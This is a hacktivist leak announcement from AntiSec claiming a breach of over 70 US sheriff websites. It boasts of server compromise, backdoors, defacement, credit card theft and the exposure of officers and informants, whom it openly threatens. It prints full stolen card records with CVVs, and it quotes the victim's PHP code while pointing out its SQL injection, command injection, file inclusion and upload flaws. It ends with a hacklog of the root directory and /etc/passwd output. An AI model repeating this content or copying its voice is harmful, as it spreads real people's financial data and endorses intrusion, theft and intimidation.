`..--.

`:.#antisec#;:

:antisec#anti;+.`

:sec#antisec#a;/:

ntisec#antisec#+a

.ntisec#antisec;:

`-` +#antisec#anti:s/

/.:+:/+.`..` `;+;ec#antisec::+

:.;;+`-./-:` .+:#antisec#anti-++`

`-` -:.``; `:.+.sec#antisec#a: -;-

`; -:::. `-:+..;/:ntisec#an.-` :+``+-

`.+- `./;.- `-/++++:`.:-;tisec#anti++ -s;`/;//-

`-:` .-:- /::+-` :/+;ec#ant;i;/.. ;s:.;:++.:

`/ .:` `;:/` .+..+///:::/:. /:e;c#a:;/+-`

`:+.. .. .:.;n+/++. `---...```` `tisec#an:/:++-

-::-` `.--` -t:./;:ise./.`.. .:+.;;c#antisec#:.;;

+- .::.` .;:.;antisec;.+;;+` .--:;..:.#;antisec;;/

`.` `++-` ./;;#antisec#a;:nt;i+.` ` ;. `-;sec#an:.`

.:. .;-` t+.isec#;a:;:;;nt;i+::.-`` ..:-` .. .;sec#a+:.

--::...; ..;ntise+c;:-` :;.-`:++.+//:- `/ `;#ant;+:

./:::.: +::isec;#. `an.. .-/.; -tisec/

`.+.::/``/+:#an:;. .ti+` `./;;:`;+ sec#.+`

/anti:;..sec#; .an. `-+.;+::.-.. ti;+:`:;`

/sec#antise/c `#a- ``-;..//+.+:.-. -ntis:::/;

ec#antisec#:+ /a. ////+//./..+++..` `;nti./:`:`

`sec#antisec#/ /;:+///...+:/.//;;;:././+- `;ant+/;`

isec#antis;. `;ec#antisec#antisec#ant:.:;;. :/:-`

isec#antis: -;ec#antisec#antisec#anti;.- .;/

/sec#antise/ c#antisec#antisec#antis.:-` .

/;;ec#an::. tise.`

`+.c#..+` ;+-.;`

`:/:

"Alright Dirty, yall boys ready? Bout to turn drive-bys revolutionary"

////////////////////////////////////////////////////////////////////////////////

## #FREETOPIARY #FREEMERCEDES #FREEBRADLEYMANNING #SHOOTINNGSHERIFFSSATURDAY ###

### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ### OWN & RM ##

////////////////////////////////////////////////////////////////////////////////

_ _ __ .__

__| || |__ _____ _____/ |_|__| ______ ____ ____ #anonymous

\ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #antisec

| || | / __ \| | \ | | |\___ \\ ___/\ \___ #lulzsec

/_ ~~ _\ (____ /___| /__| |__/____ >\___ >\___ > #freetopiary

|_||_| \/ \/ \/ \/ \/ #SSS

////////////////////////////////////////////////////////////////////////////////

ANTISEC DELIVERS OVER 10GB OF PRIVATE POLICE EMAILS, TRAINING FILES, SNITCH INFO

AND PERSONAL INFO IN RETALIATION FOR ANONYMOUS ARRESTS #ShootingSheriffsSaturday

////////////////////////////////////////////////////////////////////////////////

"Missouri Sheriff's Association Executive Director Mick Covington tells KHQA

that the most the hackers got from their organization were email addresses.

Contrary to AntiSec's announcement, there were no critical details like names,

social security numbers or other personal information details on their server

that was hacked." (DOX AND EMAILS DROPPED)

(http://www.connecttristates.com/news/story.aspx?id=646614)

"Based upon past releases of information, the content of these releases are

sometimes manipulated and edited in an attempt of embarrass or discredit

government agencies and law enforcement. Also in their release, they threaten to

publish the names of inmates and confidential informants. Informant and other

sensitive data are not kept on the website, and we believe any information that

would be released would be false in an attempt to hinder future investigations

by law enforcement." - Sheriff John Montgomery (MORE DOX DROPPED)

(http://www.baxterbulletin.com/article/20110801/NEWS01/110801001/BC-Sheriff-

Website-hacked?odyssey=tab|topnews|text|FRONTPAGE)

"President of the Missouri Sheriff's Association Steve Cox said he thinks the

hackers claim to have more information than they really do. Cox said the group

just wants glory and fame." (DOX AND SSN DROPPED)

(http://www.komu.com/news/update-group-hacks-missouri-sheriff-s-association/)

"Sheriff Joe Guy says, "We've not lost any information. There's no, we've not

been hacked. I think that's been a fear. No sensitive information is on that

website anyway." (DOX AND EMAILS DROPPED AGAIN)

http://wdef.com/news/mcminn_county_sheriffs_department_website/08/2011

////////////////////////////////////////////////////////////////////////////////

A week after we defaced and destroyed the websites of over 70 law enforcement

agencies, we are releasing a massive amount of confidential information that is

sure to embarass, discredit and incriminate police officers across the US. Over

10GB of information was leaked including hundreds of private email spools,

password information, address and social security numbers, credit card numbers,

snitch information, training files, and more. We hope that not only will

dropping this info demonstrate the inherently corrupt nature of law enforcement

using their own words, as well as result in possibly humiliation, firings, and

possible charges against several officers, but that it will also disrupt and

sabotage their ability to communicate and terrorize communities.

We are doing this in solidarity with Topiary and the Anonymous PayPal LOIC

defendants as well as all other political prisoners who are facing the gun of

the crooked court system. We stand in support of all those who struggle against

the injustices of the state and capitalism using whatever tactics are most

effective, even if that means breaking their laws in order to expose their

corruption. You may bust a few of us, but we greatly outnumber you, and you can

never stop us from continuing to destroy your systems and leak your data.

We have no sympathy for any of the officers or informants who may be endangered

by the release of their personal information. For too long they have been using

and abusing our personal information, spying on us, arresting us, beating us,

and thinking that they can get away with oppressing us in secrecy. Well it's

retribution time: we want them to experience just a taste of the kind of misery

and suffering they inflict upon us on an everyday basis. Let this serve as a

warning to would-be snitches and pigs that your leaders can no longer protect

you: give up and turn on your masters now before it's too late.

// A TALE OF TWO OWNINGS

It took less than 24 hours to root BJM's server and copy all their data to our

private servers. Soon after, their servers were taken down and a news article

came out suggesting they received advance FBI "credible threat" notice of a

"hacking plot". At this point it was too late for them because the stolen files

were gonna get leaked regardless. However we were surprised and delighted to see

that not only did they relaunch a few sites less than a week later, but that

their "bigger, faster server that offers more security" carried over our

backdoors from their original box. This time we were not going to hesitate to

pull the trigger: in less than an hour we rooted their new server and defaced

all 70+ domains while their root user was still logged in and active.

We lol'd as we watched the news reports come in, quoting various Sheriffs who

denied that they were ever hacked, that any personal information was stolen,

that they did not store snitch info on their servers. Many lulz have been had as

we taunted the sheriffs by responding to their denials by tweeting teasers

exposing their SSNs, passwords, addresses, and private emails. We also took the

liberty to backdoor their online store and capture a few credit card numbers,

which were used to make involuntary donations to the ACLU, the EFF, the Bradley

Manning Support Network, and more. Despite active FBI investigations and their

additional security measures, they could not stop us from owning their servers,

stealing their identities, and dropping all their data. Two weeks later only a

few of the sites are up with limited functionality as we scared them into

removing any dynamic PHP scripts, forcing them to use static HTML content.

A recent DHS bulletin has called us "script kiddies" that lack "any capability

to inflict damage to critical infrastructure" yet we continue to get in and out

of any system we please, destroying and dropping dox on the mightiest of

government systems that are supposed to be protecting their sick nightmare of

"law and order". GIVE UP. You are losing the cyberwar, and the attacks against

the governments, militaries, and corporations of the world will continue to

escalate.

Hackers, join us to make 2011 the year of leaks and revolutions.

////////////////////////////////////////////////////////////////////////////////

[*] ORIGINAL DEFACEMENT: http://zone-h.org/mirror/id/14515221)

[*] BROWSE THE LEAK: http://vv7pabmmyr2vnflf.onion/ (ON TOR)

http://vv7pabmmyr2vnflf.tor2web.com/ (NOT TOR)

[*] DONATE BITCOINS: 18NHixaoQekQJ3y52aBGJJwgBWX9X3myYR

The booty contains:

[*] Over 300 mail accounts from 56 law enforcement domains

[*] Missouri Sheriff account dump (mosheriffs.com)

7000+ usernames, passwords, home addresses, phones and SSNs

[*] Online Police Training Academy files

PDFs, videos, HTML files

[*] "Report a Crime" snitch list compilation (60+ entries)

[*] Plesk plaintext server passwords (ftp/ssh, email, cpanel, protected dirs)

////////////////////////////////////////////////////////////////////////////////

Over 70 US law enforcement institutions were attacked including:

20jdpa.com, adamscosheriff.org, admin.mostwantedwebsites.net,

alabamasheriffs.com, arkansassheriffsassociation.com,

bakercountysheriffoffice.org, barrycountysheriff.com, baxtercountysheriff.com,

baxtercountysherifffoundation.org, boonecountyar.com, boonesheriff.com,

cameronso.org, capecountysheriff.org, cherokeecountyalsheriff.com,

cityofgassville.org, cityofwynne.com, cleburnecountysheriff.com,

coahomacountysheriff.com, crosscountyar.org, crosscountysheriff.org,

drewcountysheriff.com, faoret.com, floydcountysheriff.org, fultoncountyso.org,

georgecountymssheriff.com, grantcountyar.com, grantcountysheriff-collector.com,

hodgemansheriff.us, hotspringcountysheriff.com, howardcountysheriffar.com,

izardcountyar.org, izardcountysheriff.org, izardhometownhealth.com,

jacksonsheriff.org, jeffersoncountykssheriff.com, jeffersoncountyms.gov,

jocomosheriff.org, johnsoncosheriff.com, jonesso.com, kansassheriffs.org,

kempercountysheriff.com, knoxcountysheriffil.com, lawrencecosheriff.com,

lcsdmo.com, marioncountysheriffar.com, marionsoal.com, mcminncountysheriff.com,

meriwethercountysheriff.org, monroecountysheriffar.com, mosheriffs.com,

mostwantedgovernmentwebsites.com, mostwantedwebsites.net,

newtoncountysheriff.org, perrycountysheriffar.org, plymouthcountysheriff.com,

poalac.org, polkcountymosheriff.org, prairiecountysheriff.org,

prattcountysheriff.com, prentisscountymssheriff.com, randolphcountysheriff.org,

rcpi-ca.org, scsosheriff.org, sebastiancountysheriff.com, sgcso.com,

sharpcountysheriff.com, sheriffcomanche.com, stfranciscountyar.org,

stfranciscountysheriff.org, stonecountymosheriff.com, stonecountysheriff.com,

talladegasheriff.org, tatecountysheriff.com, tishomingocountysheriff.com,

tunicamssheriff.com, vbcso.com, woodsonsheriff.com

////////////////////////////////////////////////////////////////////////////////

Stolen Credit Card information from mosheriffs.com online store:

Jeremy,Searcy,jeremy@pfimo.com,417-887-3626,MasterCard,5191000109460087,2,2014,

102,3526 W Nichols,,Springfield,MO,65803

Robert,Zoellr,Cabot46@aol.com,954-529-0840,Visa,4388540016715210,11,2012,501,401

E Las Olas Blvd ,Suite 130-143,FT Lauderdale ,FL,33301,571 Elbow Cay

Drive,Camden,Osage Beach,MO,65065

Jeffrey,Thomas,chymoda3@aol.com,573-529-1836,MasterCard,5109820390825461,2,2013,

768,417 North Locust Street,,Richland,MO,65556

nathan,vails,dalebud2004@sbcglobal.net,573-225-3010,Visa,4607174190144503,7,2013

,237,35984 Hwy 25,,malden,MO,63863

David,Yingling,dyingling@sbcglobal.net,573-335-5286,MasterCard,5200011252796077,

5,2014,739,617 Peironnet Drive,,Cape Girardeau,MO,63701

Mark,Bell,Mark@jailbaitcyclesandrods.com,417 830

3410,MasterCard,5441840150712888,5,2012,094,8117 West Farm Road

168,,Republic,MO,65738

////////////////////////////////////////////////////////////////////////////////

For the Blackhat & DEFCON conferences, we figure yall should hear it straight

from some real black hats. It's time to bust out the old school hacklog and mock

how vulnerable and insecure our enemies in blue really are.

////////////////////////////////////////////////////////////////////////////////

////////////////////////////////////////////////////////////////////////////////

// CONNECT.PHP

// SAFE_QUERY()... WAY TO MAKE SQL INJECTIONS WORSE BY NOT VALIDATING INPUT ...

// BUT INSTEAD PASSING RAW INPUT TO SHELL_EXEC() ALLOWING COMMAND EXECUTION !!!

////////////////////////////////////////////////////////////////////////////////

<?

$i = 0;

$path = '';

while(!is_file($path."admin/config/classes/dymin_main.php")){

$path .= '../';

$i++;

if($i>10){

$path = '';

break;

}

}

include($path."admin/config/dymin_config.php");

function safe_query($query){

if(strpos(getcwd(),'admin')){

shell_exec("echo '".date("Y-m-d H:i:s")."|".$query."' >>

/var/sql_logs/".str_replace("www.","",$_SERVER['HTTP_HOST'].""));

}

$database = DATABASE;

$username = DATABASE_USER;

$password = DATABASE_PASS;

$destination = DATABASE_HOST;

mysql_connect($destination, $username, $password) or die("<br>Unable to

connect to database: <br>". mysql_error());

mysql_select_db($database) or die ("<br> Unable to select

database[$database]: <br>" . mysql_error());

$result = mysql_query($query);

return $result;

}

?>

////////////////////////////////////////////////////////////////////////////////

// VERIFY_LOGIN.PHP

// ITS BEEN A HOT MINUTE SINCE I'VE SEEN ' OR 'a'='a SQL INJECTIONS WORK

// BUT BJM NEVER FAILS TO DELIVER THE MOST OBVIOUS OF VULNERABILITIES

////////////////////////////////////////////////////////////////////////////////

<?php

session_start();

$username = $_GET['username'];

$password = $_GET['password'];

include "../config/connect.php";

sleep(2);

$query = "select * from dymin_user where username = '$username' and password =

'$password'";

$result = safe_query($query);

$num = mysql_num_rows($result);

if($num == ''){

echo "<img src=\"images/login_deny.gif\">";

}else{

$id = mysql_result($result,0,'id');

$level = mysql_result($result,0,'level');

$_SESSION['user_id'] = $id;

$_SESSION['username'] = $username;

$_SESSION['password'] = $password;

$_SESSION['level'] = $level;

}

?>

////////////////////////////////////////////////////////////////////////////////

// RENAME_FILE.PHP

// PASSING RAW USER-SUPPLIED INPUT TO RENAME AND INCLUDE FUNCTIONS ...

// TWO VULNERABILITIES FOR THE PRICE OF ONE!!

////////////////////////////////////////////////////////////////////////////////

<?

error_reporting(E_ALL);

ini_set('display_errors', '1');

include "../../admin/config/connect.php";

$filename = $_POST['name'];

$type = $_POST['type'];

$uploads_dir_path_with_date = '../../uploads/'.date("Ymd").'/';

$uploads_dir_path = '../../uploads/'.date("Ymd").'/';

$uploads_dir_path_no_date = '../../uploads/';

if(!is_file($uploads_dir_path_no_date.'log.txt')){

$fh = fopen("$uploads_dir_path_no_date"."log.txt",'w');

shell_exec("chmod 777 $uploads_dir_path_with_date"."log.txt");

fclose($fh);

}

if(!is_dir($uploads_dir_path_with_date)){

mkdir($uploads_dir_path_with_date,'0777');

shell_exec("chmod 777 $uploads_dir_path_with_date");

}

$id = $_GET['id'];

$new_name = md5(microtime().$filename.mt_rand(10000, 32000));

rename("$uploads_dir_path_no_date$filename","$uploads_dir_path_with_date$

new_name$type");

//write file upload log

$fh = fopen("$uploads_dir_path_no_date"."log.txt",'a');

$log_info = 'DATE: '.date("m-d-Y His")."\t";

$log_info .= 'HTTP_HOST: '.$_SERVER['HTTP_HOST']."\t";

$log_info .= 'REMOTE_ADDR: '.$_SERVER['REMOTE_ADDR']."\t";

$log_info .= 'SCRIPT_FILENAME: '.$_SERVER['SCRIPT_FILENAME']."\t";

$log_info .= 'OLD_FILENAME: '.$filename."\t";

$log_info .= 'NEW_FILENAME: '.$new_name."\t

";

fwrite($fh,$log_info);

fclose($fh);

unset($fh,$log_info);

$file_to_include = $_GET['filename'];

include "$file_to_include";

?>

////////////////////////////////////////////////////////////////////////////////

// UPLOADIFY.PHP

// WAY TO GO, COMMENTING OUT THE FILE EXTENSION VALIDATING CODE

////////////////////////////////////////////////////////////////////////////////

<?php

if (!empty($_FILES)) {

$tempFile = $_FILES['Filedata']['tmp_name'];

$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';

$targetFile = str_replace('//','/',$targetPath) .

$_FILES['Filedata']['name'];

// $fileTypes = str_replace('*.','',$_REQUEST['fileext']);

// $fileTypes = str_replace(';','|',$fileTypes);

// $typesArray = split('\|',$fileTypes);

// $fileParts = pathinfo($_FILES['Filedata']['name']);

// if (in_array($fileParts['extension'],$typesArray)) {

// Uncomment the following line if you want to make the directory if it

doesn't exist

// mkdir(str_replace('//','/',$targetPath), 0755, true);

move_uploaded_file($tempFile,$targetFile);

echo "1";

// } else {

// echo 'Invalid file type.';

// }

}

?>

////////////////////////////////////////////////////////////////////////////////

// SHOW_IMAGE_DOWNLOAD.PHP

// HEY LETS TAKE RAW USER INPUT AND PASS IT TO READFILE() ...

// AT LEAST THEY HAD THE COURTESY OF VERIFYING IS_FILE() FOR US!!!

////////////////////////////////////////////////////////////////////////////////

<? include "config/header.php"; ?>

<?php

$filename = $_GET['filename'];

if(is_file($filename)) {

header("Pragma: public");

header("Expires: 0");

header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");

header("Content-Type: application/octet-stream");

header("Content-Type: application/download");

header("Content-Disposition: attachment; filename=".basename($filename).";");

header("Content-Transfer-Encoding: binary");

header("Content-Length: ".filesize($filename));

readfile("$filename");

exit();

}

?>

////////////////////////////////////////////////////////////////////////////////

// UPLOAD_SCANNER.SH

// UH OH... THEY ARE CLOSING IN ON OUR C99 SHELL!!! PLEASE...

////////////////////////////////////////////////////////////////////////////////

#!/bin/bash

#

# Scan for PHP in upload folders

#

MAILTO="-c galexander@bjmweb.com -c markm@bjmweb.com -c bnewman@bjmweb.com root"

EXCLUDES="-e watermark_wanted_photo.php -e checkimages.php -e

watermark_recalled_photo.php"

lineify (){

for i in $*

do

echo $i

done

}

# testing

#EXCLUDES="numnum"

#MAILTO="jwiegand@bjmweb.com"

#

UHOH=$(/usr/bin/find /var/www/vhosts/*/httpdocs/uploads/*.php | \

grep -v $EXCLUDES)

if [ "${UHOH}xx" != "xx" ]

then

lineify $UHOH | mail -s "Go Daddy - Upload Scanner" $MAILTO

////////////////////////////////////////////////////////////////////////////////

// ENOUGH TALK... TIME TO RIDE ON THESE PIG MOTHAFUCKAS !!! BRING ON THE HACKLOG

////////////////////////////////////////////////////////////////////////////////

$ ls -al /var/www/vhosts/

total 332

drwxr-xr-x 83 root root 4096 Jul 20 11:33 .

drwxr-xr-x 9 root root 4096 Aug 30 2010 ..

drwxr-xr-x 3 root root 4096 Dec 21 2009 .skel

drwxr-xr-x 13 root root 4096 Apr 7 2010 20jdpa.com

drwxr-xr-x 14 root root 4096 Jun 22 10:59 adamscosheriff.org

drwxr-xr-x 13 root root 4096 Nov 30 2010 admin.mostwantedwebsites.net

drwxr-xr-x 13 root root 4096 Nov 30 2010 alabamasheriffs.com

drwxr-xr-x 14 root root 4096 May 3 09:44 arkansassheriffsassociation.com

drwxr-xr-x 13 root root 4096 Nov 30 2010 bakercountysheriffoffice.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 barrycountysheriff.com

drwxr-xr-x 14 root root 4096 Apr 7 2010 baxtercountysheriff.com

drwxr-xr-x 14 root root 4096 Jun 10 09:59 baxtercountysherifffoundation.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 boonecountyar.com

drwxr-xr-x 14 root root 4096 May 10 2010 boonesheriff.com

drwxr-xr-x 13 root root 4096 Nov 30 2010 cameronso.org

drwxr-xr-x 13 root root 4096 Nov 30 2010 capecountysheriff.org

drwxr-xr-x 14 root root 4096 Apr 7 2010 cherokeecountyalsheriff.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 cherokeecountykssheriff.com

drwxr-xr-x 9 root root 4096 Dec 21 2009 chroot

drwxr-xr-x 14 root root 4096 May 19 11:36 cityofgassville.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 cityofwynne.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 cleburnecountysheriff.com

drwxr-xr-x 13 root root 4096 May 26 2010 coahomacountysheriff.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 crosscountyar.org

drwxr-xr-x 14 root root 4096 Apr 7 2010 crosscountysheriff.org

drwxr-xr-x 5 root root 4096 Oct 16 2009 default

drwxr-xr-x 13 root root 4096 Apr 7 2010 drewcountysheriff.com

drwxr-xr-x 13 root root 4096 May 26 2010 faoret.com

drwxr-xr-x 13 root root 4096 Nov 30 2010 floydcountysheriff.org

drwxr-xr-x 14 root root 4096 Mar 24 10:11 fultoncountyso.org

drwxr-xr-x 13 root root 4096 Nov 30 2010 georgecountymssheriff.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 grantcountyar.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 grantcountysheriff-collector.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 hodgemansheriff.us

drwxr-xr-x 13 root root 4096 Apr 7 2010 hotspringcountysheriff.com

drwxr-xr-x 14 root root 4096 Oct 19 2010 howardcountysheriffar.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 izardcountyar.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 izardcountysheriff.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 izardhometownhealth.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 jacksonsheriff.org

drwxr-xr-x 14 root root 4096 Jun 30 2010 jeffersoncountykssheriff.com

drwxr-xr-x 14 root root 4096 Feb 4 16:03 jeffersoncountyms.gov

drwxr-xr-x 14 root root 4096 Apr 7 2010 jocomosheriff.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 johnsoncosheriff.com

drwxr-xr-x 14 root root 4096 Jun 11 2010 jonesso.com

drwxr-xr-x 14 root root 4096 Jun 24 16:36 kansassheriffs.org

drwxr-xr-x 13 root root 4096 May 26 2010 kempercountysheriff.com

drwxr-xr-x 13 root root 4096 Nov 30 2010 knoxcountysheriffil.com

drwxr-xr-x 14 root root 4096 Apr 7 2010 lawrencecosheriff.com

drwxr-xr-x 15 root root 4096 Jun 8 08:55 lcsdmo.com

drwxr-xr-x 14 root root 4096 Jan 26 09:40 marioncountysheriffar.com

drwxr-xr-x 13 root root 4096 Nov 30 2010 marionsoal.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 mcminncountysheriff.com

drwxr-xr-x 13 root root 4096 Nov 30 2010 meriwethercountysheriff.org

drwxr-xr-x 13 root root 4096 May 26 2010 monroecountysheriffar.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 mosheriffs.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 mostwantedgovernmentwebsites.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 mostwantedwebsites.net

drwxr-xr-x 13 root root 4096 Apr 7 2010 newtoncountysheriff.org

drwxr-xr-x 13 root root 4096 Nov 30 2010 perrycountysheriffar.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 plymouthcountysheriff.com

drwxr-xr-x 14 root root 4096 Apr 21 08:36 poalac.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 polkcountymosheriff.org

drwxr-xr-x 14 root root 4096 Dec 9 2010 prairiecountysheriff.org

drwxr-xr-x 15 root root 4096 Jun 1 2010 prattcountysheriff.com

drwxr-xr-x 14 root root 4096 Jun 10 13:49 prentisscountymssheriff.com

drwxr-xr-x 13 root root 4096 Nov 30 2010 randolphcountysheriff.org

drwxr-xr-x 14 root root 4096 May 6 09:25 rcpi-ca.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 scsosheriff.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 sebastiancountysheriff.com

drwxr-xr-x 13 root root 4096 Nov 30 2010 sgcso.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 sharpcountysheriff.com

drwxr-xr-x 14 root root 4096 Mar 23 11:41 sheriffcomanche.com

drwxr-xr-x 14 root root 4096 Jun 6 13:54 stfranciscountyar.org

drwxr-xr-x 14 root root 4096 Nov 30 2010 stfranciscountysheriff.org

drwxr-xr-x 14 root root 4096 Nov 30 2010 stonecountymosheriff.com

drwxr-xr-x 14 root root 4096 Oct 27 2010 stonecountysheriff.com

drwxr-xr-x 14 root root 4096 Jun 9 11:51 talladegasheriff.org

drwxr-xr-x 13 root root 4096 Apr 7 2010 tatecountysheriff.com

drwxr-xr-x 13 root root 4096 Nov 30 2010 tishomingocountysheriff.com

drwxr-xr-x 13 root root 4096 Apr 7 2010 tunicamssheriff.com

drwxr-xr-x 14 root root 4096 Apr 7 2010 vbcso.com

drwxr-xr-x 13 root root 4096 May 26 2010 woodsonsheriff.com

// DAMN THATS A LOT OF DOMAINS... TOO BAD ZONE-H MASS DEFACEMENT NOTIFICATION

// FORM ONLY ALLOWS YOU TO SUBMIT 10 PER REQUEST... GONNA TAKE FOREVER

$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

news:x:9:13:news:/etc/news:

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

rpm:x:37:37::/var/lib/rpm:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

nscd:x:28:28:NSCD Daemon:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

pcap:x:77:77::/var/arpwatch:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

webdept:x:500:500::/home/webdept:/bin/bash

avahi:x:70:70:Avahi daemon:/:/sbin/nologin

avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

named:x:25:25:Named:/var/named:/sbin/nologin

xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin

apache:x:48:48:Apache:/var/www:/sbin/nologin

distcache:x:94:94:Distcache:/:/sbin/nologin

mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

ntp:x:38:38::/etc/ntp:/sbin/nologin

sw-cp-server:x:501:501::/:/bin/true

psaadm:x:502:502:Plesk user:/usr/local/psa/admin:/sbin/nologin

popuser:x:110:31:POP3 service user:/var/qmail/popuser:/sbin/nologin

mhandlers-user:x:30:31:mail handlers user:/:/sbin/nologin

webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin

psaftp:x:503:504:anonftp psa user:/:/sbin/nologin

alias:x:2021:2020:Qmail User:/var/qmail/alias:/sbin/nologin

qmaild:x:2020:2020:Qmail User:/var/qmail/:/sbin/nologin

qmaill:x:2022:2020:Qmail User:/var/qmail/:/sbin/nologin

qmailp:x:2023:2020:Qmail User:/var/qmail/:/sbin/nologin

qmailq:x:2520:2520:Qmail User:/var/qmail/:/sbin/nologin

qmailr:x:2521:2520:Qmail User:/var/qmail/:/sbin/nologin

qmails:x:2522:2520:Qmail User:/var/qmail/:/sbin/nologin

postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash

drweb:x:101:2523:DrWeb system account:/var/drweb:/bin/false

jdpa:x:10001:2522::/var/www/vhosts/20jdpa.com:/bin/false

barms:x:10002:2522::/var/www/vhosts/barrycountysheriff.com:/bin/false

bcsd:x:10003:2522::/var/www/vhosts/baxtercountysheriff.com:/bin/bash

bjm:x:10004:2522::/var/www/vhosts/mostwantedwebsites.net:/bin/false

demo:x:10005:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/demo:/bin/

false

dymin:x:10006:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/dymin:/bin

/false

dcsd:x:10007:2522::/var/www/vhosts/drewcountysheriff.com:/bin/false

bocg:x:10008:2522::/var/www/vhosts/boonecountyar.com:/bin/false

crcsd:x:10009:2522::/var/www/vhosts/crosscountysheriff.org:/bin/false

bocs:x:10010:2522::/var/www/vhosts/boonesheriff.com:/bin/false

izhth:x:10011:2522::/var/www/vhosts/izardhometownhealth.com:/bin/false

mcmtn:x:10012:2522::/var/www/vhosts/mcminncountysheriff.com:/bin/false

ccsal:x:10013:2522::/var/www/vhosts/cherokeecountyalsheriff.com:/bin/false

tunms:x:10014:2522::/var/www/vhosts/tunicamssheriff.com:/bin/false

ccsd:x:10015:2522::/var/www/vhosts/cleburnecountysheriff.com:/bin/false

ciwy:x:10016:2522::/var/www/vhosts/cityofwynne.com:/bin/false

ncsd:x:10017:2522::/var/www/vhosts/newtoncountysheriff.org:/bin/false

icsd:x:10019:2522::/var/www/vhosts/izardcountysheriff.org:/bin/false

shsd:x:10020:2522::/var/www/vhosts/sharpcountysheriff.com:/bin/false

polms:x:10021:2522::/var/www/vhosts/polkcountymosheriff.org:/bin/false

grcg:x:10023:2522::/var/www/vhosts/grantcountyar.com:/bin/false

lawmo:x:10024:2522::/var/www/vhosts/lawrencecosheriff.com:/bin/false

johms:x:10025:2522::/var/www/vhosts/jocomosheriff.org:/bin/false

sacsd:x:10026:2522::/var/www/vhosts/scsosheriff.org:/bin/false

jcsd:x:10027:2522::/var/www/vhosts/jacksonsheriff.org:/bin/false

gcsd:x:10028:2522::/var/www/vhosts/grantcountysheriff-collector.com:/bin/false

izcg:x:10029:2522::/var/www/vhosts/izardcountyar.org:/bin/false

jocsd:x:10030:2522::/var/www/vhosts/johnsoncosheriff.com:/bin/false

scsd:x:10031:2522::/var/www/vhosts/sebastiancountysheriff.com:/bin/false

bjm2:x:10032:2522::/var/www/vhosts/mostwantedgovernmentwebsites.com:/bin/false

test:x:10033:10033::/home/test:/bin/bash

bcsd_sync:x:10034:10034::/var/www/vhosts/baxtercountysheriff.com/home:/bin/bash

ccsal_synce:x:10035:10035::/home/ccsal_synce:/bin/bash

ccsal_sync:x:10036:10036::/var/www/vhosts/cherokeecountyalsheriff.com/home:/bin/

bash

kluser:x:10037:10037:Kaspersky AntiVirus scanner user:/var/db/kav:/sbin/nologin

tigeraccessftp:x:10038:10038::/var/www/vhosts/crosscountysheriff.org/home:/bin/

bash

vbcsd:x:10039:2522::/var/www/vhosts/vbcso.com:/bin/false

jonms2:x:10040:2522::/var/www/vhosts/jonesso.com:/bin/false

ccsoks:x:10041:2522::/var/www/vhosts/cherokeecountykssheriff.com:/bin/false

crcg:x:10042:2522::/var/www/vhosts/crosscountyar.org:/bin/false

tcsoms:x:10043:2522::/var/www/vhosts/tatecountysheriff.com:/bin/false

hcsoks:x:10018:2522::/var/www/vhosts/hodgemansheriff.us:/bin/false

jcsoks:x:10044:2522::/var/www/vhosts/jeffersoncountykssheriff.com:/bin/false

mosa:x:10045:2522::/var/www/vhosts/mosheriffs.com:/bin/false

